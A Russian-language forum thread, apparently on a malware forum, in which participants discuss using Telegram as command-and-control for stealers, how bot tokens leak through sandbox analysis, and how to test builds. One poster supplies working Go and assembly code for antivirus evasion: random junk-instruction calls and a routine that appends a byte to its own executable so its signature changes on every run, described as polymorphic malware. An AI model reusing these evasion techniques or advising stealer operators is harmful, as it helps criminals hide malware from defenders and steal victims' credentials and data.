Статья xssTgC2 Использование Telegram в качестве сервера управления и командования

[celty]

а какие условия и тип вирусни должен быть, чтоб такой исход был? интересно очень стало

Любой который на тг что-то отправляет, очевидно тот кто свой сервер не поднимает, а юзает телегу в качестве оповещение или чего то иного, он поделился своим токеном со всем интернетом

 

[phantomcoder]

Любой который на тг что-то отправляет, очевидно тот кто свой сервер не поднимает, а юзает телегу в качестве оповещение или чего то иного, он поделился своим токеном со всем интернетом

но как я понимаю стиллеру такое не грозит, из-за быстрого действия, а потом удаления с устройства.
такое грозит только ботнетам и прочему, да?

 

[celty]

но как я понимаю стиллеру такое не грозит, из-за быстрого действия

почему? грозит, если стилер отправляет логи напрямую в тг

 

[phantomcoder]

почему? грозит, если стилер отправляет логи напрямую в тг

странно, просто чекал билды старые, которые проливались много раз и там вообще не палился токен нигде на вт и отправка прямая

 

[celty]

странно, просто чекал билды старые, которые проливались много раз и там вообще не палился токен нигде на вт и отправка прямая

значит не проанализировали еще, можешь на any.run закинуть, там тебе все запросы покажет если к тг обращалься и будет видно

 

[crucial]

а какие условия и тип вирусни должен быть, чтоб такой исход был? интересно очень стало

никакой, на сколько я знаю, любой софт (ехе) чекается на запросы на вт (могу ошибаться, но как я понял то так)

 

[phantomcoder]

any.run

Не подскажешь как там зарегаться возможно? ничего не пропускает из почт

 

[celty]

Не подскажешь как там зарегаться возможно? ничего не пропускает из почт

корп почты нужны или на своем домене

 

[phantomcoder]

корп почты нужны или на своем домене

А если у тебя аккаунт есть, можешь чекнуть в лс файлик? Интересно просто очень, реально ли все так легко и примитивно

 

[DEKAn272]

Он бы рано или поздно бы улетел даже бы не по твоей вине)

Тоже верно)

 

[weaver]

0x3- Полиморфное вредоносное ПО:​

Полиморфное вредоносное ПО — это тип вредоносного программного обеспечения, разработанный для постоянного изменения своих идентифицируемых характеристик, таких как структура кода, подпись файла или шаблоны шифрования, при сохранении своей исходной функциональности. Эта характеристика затрудняет традиционным антивирусным и детектирующим системам, использующим сигнатуры, обнаружение и блокировку такого ПО.

Инструкции по мусору ASM
Go Assembly использует специфичный синтаксис, и код обычно должен быть размещен в файле с расширением .s.
Файл .s должен находиться в той же папке, что и файл .go, из которого вы будете вызывать его ASM-функцию.
Мы напишем три ASM-функции, которые в основном ничего не делают:

Спойлер: asm.s

#include "textflag.h"

TEXT ·junkASM1(SB), NOSPLIT, $0
    MOVQ $0, AX
    ADDQ $0, BX
    SUBQ $0, CX
    XORQ $0, DX
    ADDQ $0x00000000, AX
    RET


TEXT ·junkASM2(SB), NOSPLIT, $0
    MOVQ $0, BX
    ADDQ $0, CX
    SUBQ $0, DX
    XORQ $0, AX
    ADDQ $0xfffffff, BX
    RET


TEXT ·junkASM3(SB), NOSPLIT, $0
    MOVQ $0, CX
    ADDQ $0, DX
    SUBQ $0, AX
    XORQ $0, BX
    ADDQ $0xfffffff, DX
    RET

и теперь мы можем добавлять эти инструкции ASM к нашему вредоносному ПО случайным образом следующим образом:

func junkASM1()
func junkASM2()
func junkASM3()

// function slice
var junks = []func(){
    junkASM1,
    junkASM2,
    junkASM3,
}
func main() {
    //random assembly instructions
    indx := rand.Intn(3)
    rand.NewSource(time.Now().UnixNano())
    for i := 0; i < indx; i++ {
        junks[i]()
    }
    //continue stuff ...
}

это будет полезно во время выполнения.
Теперь давайте изменим сигнатуру нашего двоичного файла каждый раз, когда он запускается, мы можем сделать это просто добавив один нулевой байт в конец нашего исполняемого файла, так как это не повлияет на функциональность исполняемого файла.

f, _ := os.OpenFile(os.Args[0], os.O_WRONLY|os.O_APPEND, 0666)
f.Write([]byte{0})

Это не создаст 100% полиморфную вредоносную программу, но вы получили общее представление о том, как это можно сделать. Вам нужно проявить креативность и самостоятельно придумывать новые трюки.

del

 

[DildoFagins]

Нормальные малвари они сами себе дизассемблируют и перестраивают свой код без компилятораторов

Справедливости ради, если по классике, то это уже будет называться метаморфизмом, вопрос в том, что мало кто в современном мире будет конкретизировать терминологию. Как там было, "ручной морфинг" или типа того? Когда один господин руками в коде менял шифрованные строки и добавлял мусорный код собственного сочинения, при этом отсутствие автоматизации называл преимуществом перед конкурентами.

 

[weaver]

Справедливости ради, если по классике, то это уже будет называться метаморфизмом

Точно. Я сам уже ... Черемухи поел, когда писал текст выше. Прошу прощения что объелся черёмухи.

Полиморф - добавляет в код мусорные инструкции, чтобы затруднить дизассемблирование и анализ кода. (много мусора)
Метаморф - целиком изменяет код, сохраняя при этом оригинальный алгоритм его работы. (мало мусора, заменяет инструкциии синонимами)
Пермутация - так же изменяет код, при этом не сохраняя оригинальный алгоритм работы. (перестановка инструкций)

з.ы.
То о чем я думал, когда писал про полиморф, в голове были мысли о метаморфе

а вот

Нормальные малвари они сами себе дизассемблируют и перестраивают свой код без компиляторов.

Это уже пермутация

 

[Laitovo]

а вам наверное в голову не приходит что VT парсит куда запросы идут и там токен выставляется в открытый доступ) и челы спецом ищут чтоб беслпатный траф подсосать на вас лол)

А как они вообще находят? Вообще не понимаю..